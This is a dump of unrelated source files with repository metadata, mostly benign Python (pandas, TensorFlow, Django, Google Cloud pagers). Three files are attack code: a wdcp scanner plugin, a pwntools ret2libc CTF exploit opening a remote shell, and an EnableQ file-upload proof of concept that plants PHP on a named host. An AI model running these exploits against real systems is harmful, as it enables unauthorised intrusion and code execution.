rwspicer@alaska.edu
|
fdaa9958c1db7acfca7016877bdfcc4a501fae5c
|
2f564cb0b358d00387287fb62fec78b51c806771
|
/Tag11/dozent_projekt2_2.py
|
f8b6b362388a3e800fc5c05878e3b3e4da29872b
|
[] |
no_license
|
anna-s-dotcom/python_alles
|
b736422f842995fc8731378ffa79ae4a9ffbe543
|
a36c8aea20444b98e5676ea6cf73824453e76c85
|
refs/heads/master
| 2020-12-30T06:01:26.684038
| 2020-02-07T09:34:28
| 2020-02-07T09:34:28
| 238,884,852
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,461
|
py
|
import pandas as pd
with open('EU2014_BE_EndgErg_Wahlbezirke.csv') as file:
print(file)
codec = file.encoding
cols14 = ['WbezirksName', 'CDU', 'SPD', 'GRÜNE']
cols19 = ['Adresse', 'CDU', 'SPD', 'GRÜNE']
df2014 = pd.read_csv('EU2014_BE_EndgErg_Wahlbezirke.csv',
encoding = codec,
delimiter = ';')[cols14].dropna(thresh = 4)
df2019 = pd.read_csv('EU2019_BE_EndgErg_Wahlbezirke.csv',
encoding = codec,
delimiter = ';')[cols19].dropna(thresh = 4)
# print(df2014)
# print()
# print(df2019)
dfm = pd.merge(df2014, df2019,
left_on = 'WbezirksName',
right_on = 'Adresse',
suffixes = ('-2014', '-2019'),
how = 'inner').drop('WbezirksName', axis = 1)
# print()
# print(dfm)
# 1
dfm['diff-CDU'] = dfm['CDU-2019'] - dfm['CDU-2014']
dfm['diff-SPD'] = dfm['SPD-2019'] - dfm['SPD-2014']
dfm['diff-GRÜNE'] = dfm['GRÜNE-2019'] - dfm['GRÜNE-2014']
print(dfm)
# 2
import numpy as np
cdu = np.nansum(dfm['diff-CDU'])
spd = np.nansum(dfm['diff-SPD'])
gruene = np.nansum(dfm['diff-GRÜNE'])
ges = cdu + spd + gruene
print('Gesamtdifferenz 2019 - 2014:', ges)
# 3
ges2014 = np.nansum(dfm['CDU-2014']) + np.nansum(dfm['SPD-2014']) + np.nansum(dfm['GRÜNE-2014'])
ges2019 = np.nansum(dfm['CDU-2019']) + np.nansum(dfm['SPD-2019']) + np.nansum(dfm['GRÜNE-2019'])
|
[
"noreply@github.com"
] |
anna-s-dotcom.noreply@github.com
|
874fa3ca559f2c40ad8cc644dff21b7b95f8e113
|
0f3a0be642cd6a2dd792c548cf7212176761e9b1
|
/zoo_services/r_quant.py
|
921ca91d0ab3e32f1f20b9964aab0268989f5f96
|
[] |
no_license
|
huhabla/wps-grass-bridge
|
63a5d60735d372e295ec6adabe527eec9e72635a
|
aefdf1516a7517b1b745ec72e2d2481a78e10017
|
refs/heads/master
| 2021-01-10T10:10:34.246497
| 2014-01-22T23:40:58
| 2014-01-22T23:40:58
| 53,005,463
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 335
|
py
|
#####################################################
# This service was generated using wps-grass-bridge #
#####################################################
import ZOOGrassModuleStarter as zoo
def r_quant(m, inputs, outputs):
service = zoo.ZOOGrassModuleStarter()
service.fromMaps("r.quant", inputs, outputs)
return 3
|
[
"soerengebbert@23da3d23-e2f9-862c-be8f-f61c6c06f202"
] |
soerengebbert@23da3d23-e2f9-862c-be8f-f61c6c06f202
|
ae5947b28dec115479830ae29afd18ebc32c7e22
|
f47863b3a595cbe7ec1c02040e7214481e4f078a
|
/plugins/scan/wdcp/167.py
|
bd1da6017ce37455e7700763703fafe9d4907334
|
[] |
no_license
|
gobiggo/0bscan
|
fe020b8f6f325292bda2b1fec25e3c49a431f373
|
281cf7c5c2181907e6863adde27bd3977b4a3474
|
refs/heads/master
| 2020-04-10T20:33:55.008835
| 2018-11-17T10:05:41
| 2018-11-17T10:05:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 454
|
py
|
#Referer: http://www.securityfocus.com/archive/1/534437
def assign(service, arg):
if service == "wdcp":
return True, arg
def audit(args):
payload = 'mysql/add_user.php'
verify_url = args + payload
code, head, content, errcode,finalurl = curl.curl(verify_url)
if code==200 and 'localhost' in content:
security_hole(verify_url)
if __name__ == '__main__':
audit(assign('wdcp', 'http://wxw80.tem.com.cn:5368/')[1])
|
[
"zer0i3@aliyun.com"
] |
zer0i3@aliyun.com
|
18b9a0b08fc6f3640ffb5be316121465654299dd
|
13f4a06cd439f579e34bf38406a9d5647fe7a0f3
|
/script/try_python/try_Django/helloworld/pages/urls.py
|
59a86d03a775a770128e079590cbc606291121cb
|
[] |
no_license
|
edt-yxz-zzd/python3_src
|
43d6c2a8ef2a618f750b59e207a2806132076526
|
41f3a506feffb5f33d4559e5b69717d9bb6303c9
|
refs/heads/master
| 2023-05-12T01:46:28.198286
| 2023-05-01T13:46:32
| 2023-05-01T13:46:32
| 143,530,977
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 202
|
py
|
# pages/urls.py
from django.urls import path
from . import views
urlpatterns = [
# regular expression of path: ''
# an optional url name: 'home'
path('', views.homePageView, name='home')
]
|
[
"wuming_zher@zoho.com.cn"
] |
wuming_zher@zoho.com.cn
|
3183c146bc2bb4c8964991dcdcb8026a509b1d5e
|
eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7
|
/google/cloud/gaming/v1beta/gaming-v1beta-py/google/cloud/gaming_v1beta/services/game_server_configs_service/pagers.py
|
dc651ab737e7b1b69464cf324e8b0d27964ac8c3
|
[
"Apache-2.0"
] |
permissive
|
Tryweirder/googleapis-gen
|
2e5daf46574c3af3d448f1177eaebe809100c346
|
45d8e9377379f9d1d4e166e80415a8c1737f284d
|
refs/heads/master
| 2023-04-05T06:30:04.726589
| 2021-04-13T23:35:20
| 2021-04-13T23:35:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,131
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, AsyncIterable, Awaitable, Callable, Iterable, Sequence, Tuple, Optional
from google.cloud.gaming_v1beta.types import game_server_configs
class ListGameServerConfigsPager:
"""A pager for iterating through ``list_game_server_configs`` requests.
This class thinly wraps an initial
:class:`google.cloud.gaming_v1beta.types.ListGameServerConfigsResponse` object, and
provides an ``__iter__`` method to iterate through its
``game_server_configs`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListGameServerConfigs`` requests and continue to iterate
through the ``game_server_configs`` field on the
corresponding responses.
All the usual :class:`google.cloud.gaming_v1beta.types.ListGameServerConfigsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., game_server_configs.ListGameServerConfigsResponse],
request: game_server_configs.ListGameServerConfigsRequest,
response: game_server_configs.ListGameServerConfigsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.gaming_v1beta.types.ListGameServerConfigsRequest):
The initial request object.
response (google.cloud.gaming_v1beta.types.ListGameServerConfigsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = game_server_configs.ListGameServerConfigsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[game_server_configs.ListGameServerConfigsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[game_server_configs.GameServerConfig]:
for page in self.pages:
yield from page.game_server_configs
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListGameServerConfigsAsyncPager:
"""A pager for iterating through ``list_game_server_configs`` requests.
This class thinly wraps an initial
:class:`google.cloud.gaming_v1beta.types.ListGameServerConfigsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``game_server_configs`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListGameServerConfigs`` requests and continue to iterate
through the ``game_server_configs`` field on the
corresponding responses.
All the usual :class:`google.cloud.gaming_v1beta.types.ListGameServerConfigsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[game_server_configs.ListGameServerConfigsResponse]],
request: game_server_configs.ListGameServerConfigsRequest,
response: game_server_configs.ListGameServerConfigsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.gaming_v1beta.types.ListGameServerConfigsRequest):
The initial request object.
response (google.cloud.gaming_v1beta.types.ListGameServerConfigsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = game_server_configs.ListGameServerConfigsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[game_server_configs.ListGameServerConfigsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[game_server_configs.GameServerConfig]:
async def async_generator():
async for page in self.pages:
for response in page.game_server_configs:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
|
[
"bazel-bot-development[bot]@users.noreply.github.com"
] |
bazel-bot-development[bot]@users.noreply.github.com
|
adae1e88338dd1bbc45f87704aed5a39cb62a3b4
|
33300abc9da0dfecf538d78fa51b23a85d2ddb6f
|
/tensorflow/python/saved_model/load_test.py
|
0f7fba0c66ef87ae4e9869318b63886c5b646404
|
[
"Apache-2.0"
] |
permissive
|
danilo-augusto/tensorflow
|
b8e9ef8ebd489a62eab31e41fcdf0070e42ad348
|
4c7452c8c9b632d7ad7232099637e6fe388c3dd2
|
refs/heads/master
| 2022-05-31T03:00:12.090962
| 2018-12-19T23:11:25
| 2018-12-20T03:43:38
| 162,523,290
| 1
| 0
|
Apache-2.0
| 2022-04-17T02:40:23
| 2018-12-20T03:45:42
|
C++
|
UTF-8
|
Python
| false
| false
| 7,775
|
py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for checkpointable object SavedModel loading."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
from tensorflow.python.eager import def_function
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_spec
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import variables
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import save
from tensorflow.python.training.checkpointable import tracking
class LoadTest(test.TestCase):
def cycle(self, obj):
path = tempfile.mkdtemp(prefix=self.get_temp_dir())
save.save(obj, path, signatures={})
return load.load(path)
def test_structure_import(self):
root = tracking.Checkpointable()
root.f = def_function.function(
lambda x: 2. * x,
input_signature=[tensor_spec.TensorSpec(None, dtypes.float32)])
root.dep_one = tracking.Checkpointable()
root.dep_two = tracking.Checkpointable()
root.dep_two.dep = tracking.Checkpointable()
root.dep_three = root.dep_two.dep
imported = self.cycle(root)
self.assertIs(imported.dep_three, imported.dep_two.dep)
self.assertIsNot(imported.dep_one, imported.dep_two)
self.assertEqual(4., imported.f(constant_op.constant(2.)).numpy())
def test_variables(self):
root = tracking.Checkpointable()
root.v1 = variables.Variable(1.)
root.v2 = variables.Variable(2.)
root.f = def_function.function(
lambda x: root.v2 * x,
input_signature=[tensor_spec.TensorSpec(None, dtypes.float32)])
imported = self.cycle(root)
self.assertEquals(imported.v1.numpy(), 1.0)
self.assertEquals(imported.v2.numpy(), 2.0)
self.assertEqual(4., imported.f(constant_op.constant(2.)).numpy())
def _make_asset(self, contents):
filename = tempfile.mktemp(prefix=self.get_temp_dir())
with open(filename, "w") as f:
f.write(contents)
return filename
def test_assets_import(self):
file1 = self._make_asset("contents 1")
file2 = self._make_asset("contents 2")
root = tracking.Checkpointable()
root.f = def_function.function(
lambda x: 2. * x,
input_signature=[tensor_spec.TensorSpec(None, dtypes.float32)])
root.asset1 = tracking.TrackableAsset(file1)
root.asset2 = tracking.TrackableAsset(file2)
save_dir = os.path.join(self.get_temp_dir(), "save_dir")
save.save(root, save_dir)
file_io.delete_file(file1)
file_io.delete_file(file2)
load_dir = os.path.join(self.get_temp_dir(), "load_dir")
file_io.rename(save_dir, load_dir)
imported = load.load(load_dir)
with open(imported.asset1.asset_path.numpy(), "r") as f:
self.assertEquals("contents 1", f.read())
with open(imported.asset2.asset_path.numpy(), "r") as f:
self.assertEquals("contents 2", f.read())
def test_capture_assets(self):
root = tracking.Checkpointable()
root.vocab = tracking.TrackableAsset(self._make_asset("contents"))
root.f = def_function.function(
lambda: root.vocab.asset_path,
input_signature=[])
imported = self.cycle(root)
origin_output = root.f().numpy()
imported_output = imported.f().numpy()
self.assertNotEqual(origin_output, imported_output)
with open(imported_output, "r") as f:
self.assertEquals("contents", f.read())
def test_assets_dedup(self):
vocab = self._make_asset("contents")
root = tracking.Checkpointable()
root.f = def_function.function(
lambda x: 2. * x,
input_signature=[tensor_spec.TensorSpec(None, dtypes.float32)])
root.asset1 = tracking.TrackableAsset(vocab)
root.asset2 = tracking.TrackableAsset(vocab)
imported = self.cycle(root)
self.assertEqual(imported.asset1.asset_path.numpy(),
imported.asset2.asset_path.numpy())
def test_implicit_input_signature(self):
@def_function.function
def func(x):
return 2 * x
root = tracking.Checkpointable()
root.f = func
# Add two traces.
root.f(constant_op.constant(1.))
root.f(constant_op.constant(1))
imported = self.cycle(root)
self.assertEqual(4., imported.f(constant_op.constant(2.)).numpy())
self.assertEqual(14, imported.f(constant_op.constant(7)).numpy())
def test_explicit_input_signature(self):
@def_function.function(
input_signature=[tensor_spec.TensorSpec(None, dtypes.float32)])
def func(x):
return 2 * x
root = tracking.Checkpointable()
root.f = func
imported = self.cycle(root)
self.assertEqual(4., imported.f(constant_op.constant(2.0)).numpy())
def test_function_with_default_bool_input(self):
def func(x, training=False):
if training:
return 2 * x
else:
return 7
root = tracking.Checkpointable()
root.f = def_function.function(func)
self.assertEqual(20, root.f(constant_op.constant(10), True).numpy())
self.assertEqual(7, root.f(constant_op.constant(1)).numpy())
self.assertEqual(2, root.f(constant_op.constant(1), True).numpy())
imported = self.cycle(root)
self.assertEqual(4, imported.f(constant_op.constant(2), True).numpy())
self.assertEqual(7, imported.f(constant_op.constant(2)).numpy())
def test_positional_arguments(self):
def func(x, training=False, abc=7.1, defg=7.7):
del abc
if training:
return 2 * x
if defg == 7:
return 6
else:
return 7
root = tracking.Checkpointable()
root.f = def_function.function(func)
self.assertEqual(20, root.f(constant_op.constant(10), True).numpy())
self.assertEqual(7, root.f(constant_op.constant(1)).numpy())
self.assertEqual(2, root.f(constant_op.constant(1), True).numpy())
self.assertEqual(6, root.f(constant_op.constant(1), defg=7.0).numpy())
imported = self.cycle(root)
self.assertEqual(4, imported.f(constant_op.constant(2), True).numpy())
self.assertEqual(7, imported.f(constant_op.constant(2)).numpy())
self.assertEqual(6, imported.f(constant_op.constant(1), defg=7.0).numpy())
def test_member_function(self):
class CheckpointableWithMember(tracking.Checkpointable):
def __init__(self):
super(CheckpointableWithMember, self).__init__()
self._some_value = 20
@def_function.function
def f(self, x, training=False):
if training:
return 2 * x
else:
return 7 + self._some_value
root = CheckpointableWithMember()
self.assertEqual(20, root.f(constant_op.constant(10), True).numpy())
self.assertEqual(27, root.f(constant_op.constant(1)).numpy())
self.assertEqual(2, root.f(constant_op.constant(1), True).numpy())
imported = self.cycle(root)
self.assertEqual(4, imported.f(constant_op.constant(2), True).numpy())
self.assertEqual(27, imported.f(constant_op.constant(2)).numpy())
if __name__ == "__main__":
test.main()
|
[
"gardener@tensorflow.org"
] |
gardener@tensorflow.org
|
5f43eae02bad6a1ff86c9481554169d3de844a66
|
7194e972dfb2b7f0334e366bfa4b8bf0c578017e
|
/BsidesDelhictf2020/thanksforattending/exploit.py
|
41175edb1468bb3f5000575b925bf70f9319d0d1
|
[] |
no_license
|
Darksidesfear/CTFarchives
|
a571b5c4580d4a62cc501fc2ed1d3c2f8c41e90f
|
8baa495dc758e0f56813ffa0d5a1190a21d0bb09
|
refs/heads/master
| 2023-01-09T04:41:59.693240
| 2020-11-14T12:39:16
| 2020-11-14T12:39:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 775
|
py
|
#exploit for thanksforattending
#BSDCTF{3xpl0r1ng_th3_unkn0wn}
from pwn import *
import time
elf = ELF("./chall")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux.so.2")
context.binary=elf
target=remote('13.233.104.112',2222)
context.log_level='DEBUG'
def sla(string,val):
target.sendlineafter(string,val)
def sa(string,val):
target.sendafter(string,val)
main=0x080491F6
puts_plt=0x80490a0
payload="A"*0x28+p32(puts_plt)+p32(main)+p32(elf.got["puts"])
sla("name?\n",payload)
target.recvuntil("!\n")
libc_puts=u32(target.recv(4))
libc_base=libc_puts-libc.sym["puts"]
libc_system=libc_base+libc.sym["system"]
libc_binsh=libc_base+libc.search("/bin/sh\x00").next()
payload="A"*0x28+p32(libc_system)+p32(0xdeadbeef)+p32(libc_binsh)
sla("name?\n",payload)
target.interactive()
|
[
"arav1635@gmail.com"
] |
arav1635@gmail.com
|
21ff2fade9bf04a8e6cfbb5544b7d85718b518d9
|
8ffa21848cfc7d1b1ac76d53fd181147dfd29953
|
/api-test/py-test/Part3_Python_CookBook/test_selfdef_exp.py
|
5795486fc1dae8aa22f6eeb68f11c1ed11564383
|
[] |
no_license
|
un-knower/data-base
|
51cfefd91970073c61ccd2f5f7034ccc5d86a794
|
3274f828d326af8dbd7600530f4c0264a0bc7ba3
|
refs/heads/master
| 2020-04-02T16:35:05.287543
| 2018-09-24T11:34:03
| 2018-09-24T11:34:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,755
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Author: HuHao <huhao1@cmcm.com>
Date: '2018/7/21'
Info:
自定义异常类应该总是继承自内置的 Exception 类, 或者是继承自那些本身就是从 Exception 继承而来的类。
尽管所有类同时也继承自 BaseException ,但你不应该使用这个基类来定义新的异常。 BaseException 是为系统退出异常而保留的,
比如 KeyboardInterrupt 或 SystemExit 以及其他那些会给应用发送信号而退出的异常。 因此,捕获这些异常本身没什么意义。
这样的话,假如你继承 BaseException 可能会导致你的自定义异常不会被捕获而直接发送信号退出程序运行。
"""
import os,traceback
class NetworkError(Exception):
pass
class HostnameError(NetworkError):
pass
class TimeoutError(NetworkError):
pass
class ProtocolError(NetworkError):
pass
class CustomerError(Exception):
def __init__(self,msg,status):
# 复写 __init__ 函数时,需要调用super().__init()保证父类参数也被重新实例化
super().__init__(msg,status)
self.msg = msg
self.status = status
def test_customer():
try:
raise CustomerError('customer error',20)
except Exception as e:
print(e.msg,e.status)
print(e.args)
def test_args():
'''
. 很多其他函数库和部分Python库默认所有异常都必须有 .args 属性, 因此如果你忽略了这一步,
你会发现有些时候你定义的新异常不会按照期望运行。
'''
try:
raise RuntimeError('It failed',43,'spam')
except RuntimeError as e:
print(e.args)
if __name__=="__main__":
try:
# test_customer()
test_args()
pass
except:
traceback.print_exc()
finally:
os._exit(0)
|
[
"huhao1@cmcm.com"
] |
huhao1@cmcm.com
|
cd9ff35e22a5ef807d3bd91348b03c240a03531e
|
1ac304bb90a6635b2723455c043811c4f0fdfdf8
|
/python/mead/tf/preprocessor.py
|
c08f2d6e89eb66b45539ae187b2a905c3c3d0f47
|
[
"Apache-2.0"
] |
permissive
|
harutatsuakiyama/baseline
|
36882463638989c376121006d34e369007830f00
|
3aad1addfedad3b2ce2c78bab95855c0d41a5c93
|
refs/heads/master
| 2023-07-23T22:57:43.320828
| 2018-07-03T14:16:22
| 2018-07-03T14:16:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,645
|
py
|
import tensorflow as tf
class PreprocessorCreator(object):
def __init__(self, indices, lchars, upchars_lut, task, token_key, extra_feats):
"""
indices are created during vocab creation.
"""
self.word2index = indices['word']
self.char2index = indices.get('char')
self.indices = indices
self.lchars = lchars
self.upchars_lut = upchars_lut
self.task = task
self.token_key = token_key
self.extra_feats = extra_feats
def preproc_post(self, post_mappings):
# Split the input string, assuming that whitespace is splitter
# The client should perform any required tokenization for us and join on ' '
# WARNING: This can be a bug if the user defaults the values (-1)
# for conll, the mxlen=124, for idr, the mxlen is forced to a max BPTT
# for twpos, the mxlen=38
# this should probably be fixed by serializing the mxlen of the model
# or rereading it from the tensor from file
raw_post = post_mappings[self.token_key]
# raw_post = post_mappings
mxlen = self.task.config_params['preproc']['mxlen']
mxwlen = self.task.config_params['preproc'].get('mxwlen')
nraw_post = self._reform_raw(raw_post, mxlen)
preprocs = {}
words, sentence_length = self._create_word_vectors_from_post(nraw_post, mxlen)
preprocs['word'] = words
if 'char' in self.indices:
chars, _ = self._create_char_vectors_from_post(nraw_post, mxlen, mxwlen)
preprocs['char'] = chars
for extra in self.extra_feats:
index = self.indices[extra]
nraw = self._reform_raw(post_mappings[extra], mxlen)
t, _ = self._create_vectors_from_post(nraw, mxlen, index)
preprocs[extra] = t
return preprocs, sentence_length
def _reform_raw(self, raw, mxlen):
"""
Splits and rejoins a string to ensure that tokens meet
the required max len.
"""
#raw_post = tf.Print(raw_post, [raw_post])
raw_tokens = tf.string_split(tf.reshape(raw, [-1])).values
# sentence length <= mxlen
nraw_post = tf.reduce_join(raw_tokens[:mxlen], separator=" ")
return nraw_post
def _create_word_vectors_from_post(self, nraw_post, mxlen):
# vocab has only lowercase words
split_chars = tf.string_split(tf.reshape(nraw_post, [-1]), delimiter="").values
upchar_inds = self.upchars_lut.lookup(split_chars)
lc_raw_post = tf.reduce_join(tf.map_fn(lambda x: tf.cond(x[0] > 25,
lambda: x[1],
lambda: self.lchars[x[0]]),
(upchar_inds, split_chars), dtype=tf.string))
word_tokens = tf.string_split(tf.reshape(lc_raw_post, [-1]))
word_indices = self.word2index.lookup(word_tokens)
# Reshape them out to the proper length
reshaped_words = tf.sparse_reshape(word_indices, shape=[-1])
sentence_length = tf.size(reshaped_words) # tf.shape if 2 dims needed
x = self._reshape_indices(reshaped_words, [mxlen])
return x, sentence_length
def _create_char_vectors_from_post(self, nraw_post, mxlen, mxwlen):
# numchars per word should be <= mxwlen
unchanged_word_tokens = tf.string_split(tf.reshape(nraw_post, [-1]))
culled_word_token_vals = tf.substr(unchanged_word_tokens.values, 0, mxwlen)
char_tokens = tf.string_split(culled_word_token_vals, delimiter='')
char_indices = self.char2index.lookup(char_tokens)
xch = self._reshape_indices(char_indices, [mxlen, mxwlen])
sentence_length = tf.size(xch)
return xch, sentence_length
def _create_vectors_from_post(self, nraw_post, mxlen, index):
tokens = tf.string_split(tf.reshape(nraw_post, [-1]))
indices = index.lookup(tokens)
# Reshape them out to the proper length
reshaped = tf.sparse_reshape(indices, shape=[-1])
sentence_length = tf.size(reshaped) # tf.shape if 2 dims needed
print(sentence_length)
return self._reshape_indices(reshaped, [mxlen]), sentence_length
def _reshape_indices(self, indices, shape):
reshaped = tf.sparse_reset_shape(indices, new_shape=shape)
# Now convert to a dense representation
x = tf.sparse_tensor_to_dense(reshaped)
x = tf.contrib.framework.with_shape(shape, x)
return x
|
[
"dpressel@gmail.com"
] |
dpressel@gmail.com
|
37a9955dafd0fc6d44b7e96543830a76e22fb9f9
|
3cdd50dc60a4e7cbba204403aa6a9689d58738a8
|
/scripts/video2animeframes.py
|
6b4428fbbb6d2ec18aca17a2a278889907fe6446
|
[] |
no_license
|
w13ww/AnimeGANv2_pytorch
|
ea6df68d34ad7012517222b1c61290d27fef2118
|
45885494e99eb46a914f24a6880aad40d6bee84a
|
refs/heads/main
| 2023-06-03T09:30:39.045119
| 2021-06-27T07:15:18
| 2021-06-27T07:15:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,130
|
py
|
# coding: utf-8
# Author: wanhui0729@gmail.com
import os, sys
project_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(project_path)
import cv2
import torch
import argparse
import numpy as np
from tqdm import tqdm
from PIL import Image
from animeganv2.configs import cfg
from animeganv2.modeling.generator import build_generator
from animeganv2.data.transforms.build import build_transforms
from animeganv2.utils.model_serialization import load_state_dict
from animeganv2.modeling.utils import adjust_brightness_from_src_to_dst
def get_model(model_weight, device):
model = build_generator(cfg)
checkpoint = torch.load(model_weight, map_location=torch.device("cpu"))
load_state_dict(model, checkpoint.pop("models").pop("generator"))
model.to(device)
return model
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--config-file",
default="",
metavar="FILE",
help="path to config file",
type=str,
)
parser.add_argument(
"--video_path",
type=str,
required=True
)
parser.add_argument(
"--output_path",
type=str,
required=True
)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
video_path = args.video_path
output_path = args.output_path
model_weight = cfg.MODEL.WEIGHT
device = torch.device(cfg.MODEL.DEVICE)
model = get_model(model_weight, device)
model.eval()
transform = build_transforms(cfg, False)
videos = os.listdir(video_path)
for video in tqdm(videos):
try:
videoPath = os.path.join(video_path, video)
outputDir = os.path.join(output_path, video)
if os.path.exists(outputDir):
continue
os.mkdir(outputDir)
videoCapture = cv2.VideoCapture(videoPath)
frame_num = int(videoCapture.get(cv2.CAP_PROP_FRAME_COUNT))
for i in tqdm(range(frame_num)):
success, frame = videoCapture.read()
frame = cv2.resize(frame, (1920, 1080))
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
input = Image.fromarray(frame)
input = transform([input])[0][0].unsqueeze(0)
input = input.to(device)
with torch.no_grad():
pred = model(input).cpu()
pred_img = (pred.squeeze() + 1.) / 2 * 255
pred_img = pred_img.permute(1, 2, 0).numpy().clip(0, 255).astype(np.uint8)
pred_img = adjust_brightness_from_src_to_dst(pred_img, frame)
video_frame = cv2.cvtColor(pred_img, cv2.COLOR_RGB2BGR)
cv2.imwrite(os.path.join(outputDir, '{}.jpg'.format(i)), video_frame)
videoCapture.release()
except:
continue
if __name__ == '__main__':
main()
|
[
"13658247573@163.com"
] |
13658247573@163.com
|
93588fbdc90eb41278a4ea6c88b24176f50fec7d
|
43ff15a7989576712d0e51f0ed32e3a4510273c0
|
/tools/pocs/bugscan/exp_1672.py
|
60046495bc3b154b90d6fe925db050e888d2a320
|
[] |
no_license
|
v1cker/kekescan
|
f2b51d91a9d6496e2cdc767eb6a600171f513449
|
3daa1775648439ba9e0003a376f90b601820290e
|
refs/heads/master
| 2020-09-19T16:26:56.522453
| 2017-06-15T02:55:24
| 2017-06-15T02:55:24
| 94,495,007
| 6
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,784
|
py
|
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
#-*- encoding:utf-8 -*-
# Title EnableQ官方免费版任意文件上传
# Referer http://www.wooyun.org/bugs/wooyun-2010-0128219
def assign(service, arg):
if service == "enableq":
return True, arg
def audit(arg):
raw = """POST /Android/FileUpload.php?optionID=1 HTTP/1.1
Host: xxxxx.com
Content-Length: 316
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 UBrowser/5.5.7386.17 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXp86Nj8hIcFckX4
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=8ff192ee943f84f5047a44d02f4b453e
------WebKitFormBoundaryQXp86Nj8hIcFckX4
Content-Disposition: form-data; name="uploadedfile_1"; filename="xxx.php"
Content-Type: application/octet-stream
<?php echo md5(1);unlink(__FILE__);?>
------WebKitFormBoundaryQXp86Nj8hIcFckX4
Content-Disposition: form-data; name="button"
提交
------WebKitFormBoundaryQXp86Nj8hIcFckX4--"""
url = arg + 'Android/FileUpload.php?optionID=1'
code, head,res, errcode, _ = curl.curl2(url,raw=raw)
if code == 200 and 'true|1|' in res:
File = res.replace('true|1|','PerUserData/tmp/')
url2 = arg + File
code, head,res, errcode, _ = curl.curl2(url2)
if code==200 and 'c4ca4238a0b923820dcc509a6f75849b' in res:
security_hole(url)
if __name__ == '__main__':
from dummy import *
audit(assign('enableq', 'http://isurvey.pamri.com/')[1])
|
[
"liyueke@huobi.com"
] |
liyueke@huobi.com
|
e1ef348edf0b502bc60a1db5bcc1ec87914047ab
|
60d737103373825b858e67292865bda8c6f2094f
